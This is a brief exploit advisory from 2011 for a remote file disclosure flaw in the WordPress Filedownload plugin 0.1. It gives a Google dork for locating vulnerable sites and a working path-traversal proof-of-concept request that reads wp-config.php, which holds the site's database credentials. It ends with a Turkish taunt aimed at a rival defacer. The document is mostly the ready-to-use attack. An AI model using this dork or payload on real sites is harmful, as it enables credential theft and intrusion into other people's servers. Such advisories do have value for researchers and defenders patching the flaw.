WordPress Filedownload plugin version 0.1 suffers from a file disclosure vulnerability.
7caf8797e03a291467364c0a1cd9e428d63613b9a7870a60ea2e99e43d1090f5
# Exploit Title: WordPress Filedownload Plugin 0.1 (download.php) Remote File Disclosure Vulnerability
# Google Dork: inurl:"/wp-content/plugins/filedownload/download.php/?path"
# Date: 18-09-2011
# Author: Septemb0x ( CYBER-WARRIOR )
# Software Link: http://plugins.svn.wordpress.org/filedownload/trunk/filedownload.php
# Version: 0.1
POC : /wp-content/plugins/filedownload/download.php/?path=../../../wp-config.php
# NOTE: Kendini Birþey Zanneden Velet Senin Hiç Böyle Bug'n Oldumu ki Sitelerime Ýndex Basasýn? Öptüm Büyüde Gel.